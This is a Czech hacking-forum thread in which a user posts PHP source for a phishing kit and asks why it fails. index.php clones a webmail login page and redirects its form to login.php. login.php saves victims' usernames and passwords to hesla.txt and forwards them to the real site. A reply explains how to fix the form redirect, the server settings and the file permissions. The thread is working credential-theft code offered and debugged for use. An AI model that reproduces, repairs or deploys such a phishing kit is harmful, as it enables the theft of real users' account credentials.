phising
HackForum
| tak jsem rozjel konečně ty skripty za pomoci Antiho, ale neco me nefacha, kdyz klepnu na prihlasit tak se me to normalne prihlasi do schranky a vubec se to nepřesměruj na login.php nevíte co s tím?
zde uvadim zdrojaky:
---------index.php--------
<?
$open=FOpen("[link]","r"); // otvoríme súbor na čítanie
while(!feof($open))
{
$read .= fread($open,1024);
}
FClose($open); // zatvoríme súbor
$nahradene=str_replace("[link]","login.php",$read); // Nahradíme login súbor azetu za náš za náš súbor
echo $nahradene; // a teraz to celé zobrazíme
?>
-------login.php.--------
<?
$file = @FOpen("hesla.txt", "a");
$data = @FRead($file,FileSize("hesla.txt"));
@FClose($file);
$file = FOpen("hesla.txt", "w");
FWrite($file,$data.$name." : ".$pwd."\n");
FClose($file);
header("location: [link]");
?>
(odpovědět) | |
|
|
|
| Protože JavaScript, navíc máš 'search' v str_replace() špatně. Prolez si kód www.centrum.cz a zjistíš, kde je chyba. Viz. tahle část:
<form method="post" action="[link]" id="em-f" onsubmit="checkBro();">
Navíc ten tvůj kód potřebuje server s podporou url_fopen a register_globals on, což není každý. A ještě musíš nastavit chmod pro soubor hesla.txt, aby do něj mohl skript zapisovat.
(odpovědět) | |
|
|
